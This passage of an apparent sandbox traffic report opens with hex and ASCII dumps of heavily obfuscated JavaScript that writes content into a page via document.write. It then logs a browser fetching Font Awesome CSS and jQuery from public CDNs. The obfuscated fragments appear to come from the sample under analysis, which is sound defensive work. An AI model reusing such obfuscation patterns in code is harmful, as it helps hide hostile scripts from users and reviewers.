717,0x1455)+'MzMzMzMzMy'+_0x20be6f(0x2aa5,0x2829,0x1ab8,0x223b)+'IiIiIiIiIi'+_0x1129a4(0xc6d,0x3190,0x1eaa,0x15b3)+_0x20be6f(0x28f5,0x1d30,0x1ab8,0x2032)+_0x20be6f(0x1094,0x1ee3,0x1bf8,0x1319)+_0x1129a4(0x2495,0x2946,0x1717,0x1599)+_0x20be6f(0x2021,0x1645
2024-07-03 19:20:01 UTC	9483	IN	Data Raw: 78 31 31 32 39 61 34 28 30 78 31 64 61 34 2c 30 78 32 61 38 63 2c 30 78 32 33 31 34 2c 30 78 32 37 39 34 29 2b 5f 30 78 31 31 32 39 61 34 28 30 78 32 32 36 32 2c 30 78 32 63 64 62 2c 30 78 32 33 31 34 2c 30 78 31 30 32 38 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 31 34 62 32 2c 30 78 31 32 65 38 2c 30 78 31 66 32 32 2c 30 78 31 64 63 33 29 2b 27 56 56 56 56 56 56 56 56 56 56 27 2b 5f 30 78 31 31 32 39 61 34 28 30 78 32 38 62 32 2c 30 78 33 31 63 36 2c 30 78 32 38 30 65 2c 30 78 32 37 64 39 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 31 38 65 31 2c 30 78 37 64 61 2c 30 78 36 34 38 2c 30 78 61 35 32 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 31 38 63 66 2c 2d 30 78 37 65 61 2c 30 78 36 34 38 2c 30 78 37 34 62 29 2b 27 52 45 52 45 52 45 52 45 52 45 27 2b 5f 30 Data Ascii: x1129a4(0x1da4,0x2a8c,0x2314,0x2794)+_0x1129a4(0x2262,0x2cdb,0x2314,0x1028)+_0x20be6f(0x14b2,0x12e8,0x1f22,0x1dc3)+'VVVVVVVVVV'+_0x1129a4(0x28b2,0x31c6,0x280e,0x27d9)+_0x20be6f(0x18e1,0x7da,0x648,0xa52)+_0x20be6f(0x18cf,-0x7ea,0x648,0x74b)+'RERERERERE'+_0
2024-07-03 19:20:01 UTC	8949	IN	Data Raw: 37 29 2b 5f 30 78 31 31 32 39 61 34 28 30 78 31 33 62 35 2c 30 78 31 63 32 62 2c 30 78 31 63 31 37 2c 30 78 31 36 33 31 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 31 35 33 39 2c 2d 30 78 31 37 38 2c 30 78 66 31 61 2c 30 78 31 65 36 37 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 33 34 61 32 2c 30 78 31 62 62 65 2c 30 78 32 33 38 31 2c 30 78 32 31 65 62 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 63 39 66 2c 30 78 34 63 35 2c 30 78 66 31 61 2c 2d 30 78 31 33 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 31 38 62 65 2c 30 78 33 34 39 63 2c 30 78 32 32 61 62 2c 30 78 31 61 32 35 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 31 36 31 35 2c 2d 30 78 31 34 2c 30 78 66 31 61 2c 30 78 31 64 64 33 29 2b 27 41 41 41 41 41 41 41 41 41 41 27 2b 27 66 67 41 41 41 41 41 41 41 41 27 Data Ascii: 7)+_0x1129a4(0x13b5,0x1c2b,0x1c17,0x1631)+_0x20be6f(0x1539,-0x178,0xf1a,0x1e67)+_0x20be6f(0x34a2,0x1bbe,0x2381,0x21eb)+_0x20be6f(0xc9f,0x4c5,0xf1a,-0x13)+_0x20be6f(0x18be,0x349c,0x22ab,0x1a25)+_0x20be6f(0x1615,-0x14,0xf1a,0x1dd3)+'AAAAAAAAAA'+'fgAAAAAAAA'
2024-07-03 19:20:01 UTC	16384	IN	Data Raw: 30 78 39 64 39 2c 30 78 63 65 64 2c 30 78 31 37 31 37 2c 30 78 62 36 63 29 2b 5f 30 78 31 31 32 39 61 34 28 30 78 31 37 62 33 2c 30 78 32 31 34 63 2c 30 78 32 34 63 66 2c 30 78 32 33 37 63 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 32 30 33 31 2c 30 78 31 34 35 38 2c 30 78 31 61 62 38 2c 30 78 32 63 64 32 29 2b 27 49 69 49 69 49 67 41 41 4d 7a 27 2b 5f 30 78 31 31 32 39 61 34 28 30 78 32 37 65 37 2c 30 78 66 37 37 2c 30 78 31 37 31 37 2c 30 78 35 35 39 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 31 66 65 31 2c 30 78 32 64 35 2c 30 78 31 33 32 35 2c 30 78 33 61 64 29 2b 5f 30 78 31 31 32 39 61 34 28 30 78 32 36 66 30 2c 30 78 32 30 63 66 2c 30 78 32 61 35 61 2c 30 78 32 39 35 38 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 32 37 37 61 2c 30 78 38 36 31 2c 30 78 Data Ascii: 0x9d9,0xced,0x1717,0xb6c)+_0x1129a4(0x17b3,0x214c,0x24cf,0x237c)+_0x20be6f(0x2031,0x1458,0x1ab8,0x2cd2)+'IiIiIgAAMz'+_0x1129a4(0x27e7,0xf77,0x1717,0x559)+_0x20be6f(0x1fe1,0x2d5,0x1325,0x3ad)+_0x1129a4(0x26f0,0x20cf,0x2a5a,0x2958)+_0x20be6f(0x277a,0x861,0x
2024-07-03 19:20:01 UTC	16384	IN	Data Raw: 31 38 34 30 2c 2d 30 78 35 37 35 2c 30 78 37 31 39 2c 30 78 36 64 33 29 2b 5f 30 78 31 31 32 39 61 34 28 30 78 31 62 33 38 2c 30 78 32 33 34 30 2c 30 78 32 33 33 31 2c 30 78 32 33 33 38 29 2b 5f 30 78 31 31 32 39 61 34 28 30 78 35 32 65 2c 30 78 31 34 37 2c 30 78 61 33 61 2c 2d 30 78 33 30 63 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 31 61 39 32 2c 30 78 31 31 34 38 2c 30 78 31 35 64 35 2c 30 78 62 63 61 29 2b 5f 30 78 31 31 32 39 61 34 28 30 78 31 37 39 36 2c 30 78 33 35 65 65 2c 30 78 32 33 31 34 2c 30 78 31 36 65 38 29 2b 5f 30 78 31 31 32 39 61 34 28 30 78 36 39 32 2c 30 78 32 36 34 64 2c 30 78 31 35 39 33 2c 30 78 31 64 32 63 29 2b 5f 30 78 32 30 62 65 36 66 28 2d 30 78 65 62 33 2c 30 78 31 33 30 62 2c 30 78 31 61 62 2c 30 78 31 31 32 37 29 2b 5f 30 Data Ascii: 1840,-0x575,0x719,0x6d3)+_0x1129a4(0x1b38,0x2340,0x2331,0x2338)+_0x1129a4(0x52e,0x147,0xa3a,-0x30c)+_0x20be6f(0x1a92,0x1148,0x15d5,0xbca)+_0x1129a4(0x1796,0x35ee,0x2314,0x16e8)+_0x1129a4(0x692,0x264d,0x1593,0x1d2c)+_0x20be6f(-0xeb3,0x130b,0x1ab,0x1127)+_0
2024-07-03 19:20:01 UTC	16384	IN	Data Raw: 62 61 29 5d 28 5f 30 78 32 30 62 65 36 66 28 30 78 31 34 31 38 2c 30 78 31 32 66 35 2c 30 78 31 30 32 64 2c 30 78 64 32 64 29 2b 27 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 27 2b 27 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 66 6f 72 6d 61 74 27 2b 27 28 5c 78 32 37 65 6d 62 65 64 64 65 64 27 2b 5f 30 78 32 30 62 65 36 66 28 30 78 31 32 39 35 2c 30 78 66 33 39 2c 30 78 31 34 64 31 2c 30 78 39 64 33 29 2b 27 29 2c 27 29 2c 64 6f 63 75 6d 65 6e 74 5b 27 77 72 69 74 65 27 5d 28 5f 30 78 32 30 62 65 36 66 28 30 78 32 30 34 38 2c 30 78 35 33 39 2c 30 78 31 30 32 64 2c 30 78 31 39 61 35 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 31 39 39 35 2c 30 78 32 31 39 30 2c 30 78 31 30 32 Data Ascii: ba)](_0x20be6f(0x1418,0x12f5,0x102d,0xd2d)+'\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'+'\x20\x20\x20\x20format'+'(\x27embedded'+_0x20be6f(0x1295,0xf39,0x14d1,0x9d3)+'),'),document['write'](_0x20be6f(0x2048,0x539,0x102d,0x19a5)+_0x20be6f(0x1995,0x2190,0x102
2024-07-03 19:20:01 UTC	16384	IN	Data Raw: 62 37 65 29 2b 27 63 5f 6f 5c 78 32 30 33 30 30 30 6d 73 27 2b 5f 30 78 31 31 32 39 61 34 28 30 78 32 30 33 62 2c 30 78 31 32 61 35 2c 30 78 32 31 35 32 2c 30 78 32 34 38 63 29 2b 5f 30 78 31 31 32 39 61 34 28 30 78 31 64 31 35 2c 30 78 32 31 31 37 2c 30 78 31 63 61 35 2c 30 78 32 62 61 33 29 2b 5f 30 78 31 31 32 39 61 34 28 30 78 31 38 34 36 2c 30 78 32 36 39 36 2c 30 78 31 36 66 61 2c 30 78 31 62 65 34 29 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 32 30 62 65 36 66 28 30 78 35 61 34 2c 30 78 32 32 31 2c 30 78 36 64 30 2c 30 78 31 37 33 38 29 5d 28 5f 30 78 31 31 32 39 61 34 28 30 78 35 64 31 2c 30 78 31 64 31 66 2c 30 78 31 34 31 66 2c 30 78 37 63 38 29 2b 5f 30 78 31 31 32 39 61 34 28 30 78 31 65 30 30 2c 30 78 31 31 63 32 2c 30 78 32 30 66 63 2c 30 78 Data Ascii: b7e)+'c_o\x203000ms'+_0x1129a4(0x203b,0x12a5,0x2152,0x248c)+_0x1129a4(0x1d15,0x2117,0x1ca5,0x2ba3)+_0x1129a4(0x1846,0x2696,0x16fa,0x1be4)),document[_0x20be6f(0x5a4,0x221,0x6d0,0x1738)](_0x1129a4(0x5d1,0x1d1f,0x141f,0x7c8)+_0x1129a4(0x1e00,0x11c2,0x20fc,0x
2024-07-03 19:20:01 UTC	16384	IN	Data Raw: 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 32 30 62 65 36 66 28 30 78 31 30 39 62 2c 30 78 31 30 33 66 2c 30 78 36 64 30 2c 30 78 31 35 63 32 29 5d 28 5f 30 78 31 31 32 39 61 34 28 30 78 32 36 37 64 2c 30 78 31 63 37 61 2c 30 78 31 34 31 66 2c 30 78 34 62 35 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 64 39 65 2c 30 78 35 32 32 2c 30 78 31 30 32 64 2c 30 78 31 62 61 62 29 2b 27 74 72 61 6e 73 66 6f 72 6d 3a 27 2b 5f 30 78 32 30 62 65 36 66 28 2d 30 78 33 62 38 2c 30 78 35 31 38 2c 30 78 62 38 31 2c 30 78 34 39 32 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 31 61 65 37 2c 30 78 32 39 39 64 2c 30 78 31 37 65 39 2c 30 78 31 37 33 63 29 2b 5f 30 78 32 30 62 65 36 66 28 2d 30 78 31 30 30 36 2c 30 78 66 65 33 2c 30 78 32 65 66 2c 30 78 38 36 32 29 2b 5f 30 78 32 30 62 Data Ascii: ,document[_0x20be6f(0x109b,0x103f,0x6d0,0x15c2)](_0x1129a4(0x267d,0x1c7a,0x141f,0x4b5)+_0x20be6f(0xd9e,0x522,0x102d,0x1bab)+'transform:'+_0x20be6f(-0x3b8,0x518,0xb81,0x492)+_0x20be6f(0x1ae7,0x299d,0x17e9,0x173c)+_0x20be6f(-0x1006,0xfe3,0x2ef,0x862)+_0x20b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	104.17.24.14	443	5312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-03 19:20:03 UTC	558	OUT	GET /ajax/libs/font-awesome/4.7.0/css/font-awesome.css HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: null sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: style Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 19:20:04 UTC	942	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 19:20:03 GMT Content-Type: text/css; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"5eb03e5f-9226" Last-Modified: Mon, 04 May 2020 16:10:07 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 168770 Expires: Mon, 23 Jun 2025 19:20:03 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cjaP2vht8x5Lyn9iCwm7qJQFN13oGHm4XR6dD1EPNOyEaVhKjB0qBLlV6Vr73H0R7eht1swqa4dXtLaRMdKC%2FJK4jQGw2IXfvf0Ab2ufc3JiPcP3385BMwvltz9H%2B9YbNhDsiZhX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 89d93b10de958c54-EWR alt-svc: h3=":443"; ma=86400
2024-07-03 19:20:04 UTC	427	IN	Data Raw: 37 62 66 62 0d 0a 2f 2a 21 0a 20 2a 20 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 34 2e 37 2e 30 20 62 79 20 40 64 61 76 65 67 61 6e 64 79 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 20 2d 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 0a 20 2a 20 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 2f 6c 69 63 65 6e 73 65 20 28 46 6f 6e 74 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 53 53 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 2f 0a 2f 2a 20 46 4f 4e 54 20 50 41 54 48 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 46 6f 6e 74 41 77 65 73 Data Ascii: 7bfb/! Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) // FONT PATH * -------------------------- */@font-face { font-family: 'FontAwes
2024-07-03 19:20:04 UTC	1369	IN	Data Raw: 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 77 6f 66 66 32 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 20 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 77 6f 66 66 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 2c 20 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 74 74 66 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 2c 20 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 73 76 67 3f 76 3d 34 2e 37 2e 30 23 66 6f 6e 74 61 77 65 73 6f 6d 65 72 65 67 75 6c 61 72 27 29 20 66 6f 72 6d 61 74 28 Data Ascii: wesome-webfont.woff2?v=4.7.0') format('woff2'), url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'), url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'), url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format(
2024-07-03 19:20:04 UTC	1369	IN	Data Raw: 0a 7d 0a 2f 2a 20 44 65 70 72 65 63 61 74 65 64 20 61 73 20 6f 66 20 34 2e 34 2e 30 20 2a 2f 0a 2e 70 75 6c 6c 2d 72 69 67 68 74 20 7b 0a 20 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 70 75 6c 6c 2d 6c 65 66 74 20 7b 0a 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 7d 0a 2e 66 61 2e 70 75 6c 6c 2d 6c 65 66 74 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 2e 33 65 6d 3b 0a 7d 0a 2e 66 61 2e 70 75 6c 6c 2d 72 69 67 68 74 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2e 33 65 6d 3b 0a 7d 0a 2e 66 61 2d 73 70 69 6e 20 7b 0a 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 20 66 61 2d 73 70 69 6e 20 32 73 20 69 6e 66 69 6e 69 74 65 20 6c 69 6e 65 61 72 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 66 61 2d 73 70 69 6e 20 Data Ascii: }/* Deprecated as of 4.4.0 */.pull-right { float: right;}.pull-left { float: left;}.fa.pull-left { margin-right: .3em;}.fa.pull-right { margin-left: .3em;}.fa-spin { -webkit-animation: fa-spin 2s infinite linear; animation: fa-spin
2024-07-03 19:20:04 UTC	1369	IN	Data Raw: 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 61 73 69 63 49 6d 61 67 65 28 72 6f 74 61 74 69 6f 6e 3d 30 2c 20 6d 69 72 72 6f 72 3d 31 29 22 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 2d 31 2c 20 31 29 3b 0a 20 20 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 2d 31 2c 20 31 29 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 2d 31 2c 20 31 29 3b 0a 7d 0a 2e 66 61 2d 66 6c 69 70 2d 76 65 72 74 69 63 61 6c 20 7b 0a 20 20 2d 6d 73 2d 66 69 6c 74 65 72 3a 20 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 61 73 69 63 49 6d 61 67 65 28 72 6f 74 61 74 69 6f 6e 3d 32 2c 20 Data Ascii: rogid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)"; -webkit-transform: scale(-1, 1); -ms-transform: scale(-1, 1); transform: scale(-1, 1);}.fa-flip-vertical { -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2,
2024-07-03 19:20:04 UTC	1369	IN	Data Raw: 72 67 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 30 39 22 3b 0a 7d 0a 2e 66 61 2d 74 68 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 30 61 22 3b 0a 7d 0a 2e 66 61 2d 74 68 2d 6c 69 73 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 30 62 22 3b 0a 7d 0a 2e 66 61 2d 63 68 65 63 6b 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 30 63 22 3b 0a 7d 0a 2e 66 61 2d 72 65 6d 6f 76 65 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 63 6c 6f 73 65 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 74 69 6d 65 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 30 64 22 3b 0a 7d 0a 2e 66 61 2d 73 65 61 72 63 68 2d 70 6c 75 73 3a 62 65 66 6f Data Ascii: rge:before { content: "\f009";}.fa-th:before { content: "\f00a";}.fa-th-list:before { content: "\f00b";}.fa-check:before { content: "\f00c";}.fa-remove:before,.fa-close:before,.fa-times:before { content: "\f00d";}.fa-search-plus:befo
2024-07-03 19:20:04 UTC	1369	IN	Data Raw: 74 3a 20 22 5c 66 30 32 39 22 3b 0a 7d 0a 2e 66 61 2d 62 61 72 63 6f 64 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 61 22 3b 0a 7d 0a 2e 66 61 2d 74 61 67 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 62 22 3b 0a 7d 0a 2e 66 61 2d 74 61 67 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 63 22 3b 0a 7d 0a 2e 66 61 2d 62 6f 6f 6b 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 64 22 3b 0a 7d 0a 2e 66 61 2d 62 6f 6f 6b 6d 61 72 6b 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 65 22 3b 0a 7d 0a 2e 66 61 2d 70 72 69 6e 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 Data Ascii: t: "\f029";}.fa-barcode:before { content: "\f02a";}.fa-tag:before { content: "\f02b";}.fa-tags:before { content: "\f02c";}.fa-book:before { content: "\f02d";}.fa-bookmark:before { content: "\f02e";}.fa-print:before { content: "\f02
2024-07-03 19:20:04 UTC	1369	IN	Data Raw: 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 34 38 22 3b 0a 7d 0a 2e 66 61 2d 66 61 73 74 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 34 39 22 3b 0a 7d 0a 2e 66 61 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 34 61 22 3b 0a 7d 0a 2e 66 61 2d 70 6c 61 79 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 34 62 22 3b 0a 7d 0a 2e 66 61 2d 70 61 75 73 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 34 63 22 3b 0a 7d 0a 2e 66 61 2d 73 74 6f 70 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 34 64 22 3b 0a 7d 0a Data Ascii: -backward:before { content: "\f048";}.fa-fast-backward:before { content: "\f049";}.fa-backward:before { content: "\f04a";}.fa-play:before { content: "\f04b";}.fa-pause:before { content: "\f04c";}.fa-stop:before { content: "\f04d";}
2024-07-03 19:20:04 UTC	1369	IN	Data Raw: 20 22 5c 66 30 36 37 22 3b 0a 7d 0a 2e 66 61 2d 6d 69 6e 75 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 36 38 22 3b 0a 7d 0a 2e 66 61 2d 61 73 74 65 72 69 73 6b 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 36 39 22 3b 0a 7d 0a 2e 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 36 61 22 3b 0a 7d 0a 2e 66 61 2d 67 69 66 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 36 62 22 3b 0a 7d 0a 2e 66 61 2d 6c 65 61 66 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 36 63 22 3b 0a 7d 0a 2e 66 61 2d 66 69 72 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 Data Ascii: "\f067";}.fa-minus:before { content: "\f068";}.fa-asterisk:before { content: "\f069";}.fa-exclamation-circle:before { content: "\f06a";}.fa-gift:before { content: "\f06b";}.fa-leaf:before { content: "\f06c";}.fa-fire:before { cont
2024-07-03 19:20:04 UTC	1369	IN	Data Raw: 74 68 75 6d 62 73 2d 6f 2d 75 70 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 38 37 22 3b 0a 7d 0a 2e 66 61 2d 74 68 75 6d 62 73 2d 6f 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 38 38 22 3b 0a 7d 0a 2e 66 61 2d 73 74 61 72 2d 68 61 6c 66 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 38 39 22 3b 0a 7d 0a 2e 66 61 2d 68 65 61 72 74 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 38 61 22 3b 0a 7d 0a 2e 66 61 2d 73 69 67 6e 2d 6f 75 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 38 62 22 3b 0a 7d 0a 2e 66 61 2d 6c 69 6e 6b 65 64 69 6e 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 Data Ascii: thumbs-o-up:before { content: "\f087";}.fa-thumbs-o-down:before { content: "\f088";}.fa-star-half:before { content: "\f089";}.fa-heart-o:before { content: "\f08a";}.fa-sign-out:before { content: "\f08b";}.fa-linkedin-square:before {
2024-07-03 19:20:04 UTC	1369	IN	Data Raw: 30 61 36 22 3b 0a 7d 0a 2e 66 61 2d 68 61 6e 64 2d 6f 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 61 37 22 3b 0a 7d 0a 2e 66 61 2d 61 72 72 6f 77 2d 63 69 72 63 6c 65 2d 6c 65 66 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 61 38 22 3b 0a 7d 0a 2e 66 61 2d 61 72 72 6f 77 2d 63 69 72 63 6c 65 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 61 39 22 3b 0a 7d 0a 2e 66 61 2d 61 72 72 6f 77 2d 63 69 72 63 6c 65 2d 75 70 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 61 61 22 3b 0a 7d 0a 2e 66 61 2d 61 72 72 6f 77 2d 63 69 72 63 6c 65 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 Data Ascii: 0a6";}.fa-hand-o-down:before { content: "\f0a7";}.fa-arrow-circle-left:before { content: "\f0a8";}.fa-arrow-circle-right:before { content: "\f0a9";}.fa-arrow-circle-up:before { content: "\f0aa";}.fa-arrow-circle-down:before { content:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	151.101.130.137	443	5312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-03 19:20:03 UTC	586	OUT	GET /jquery-3.1.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
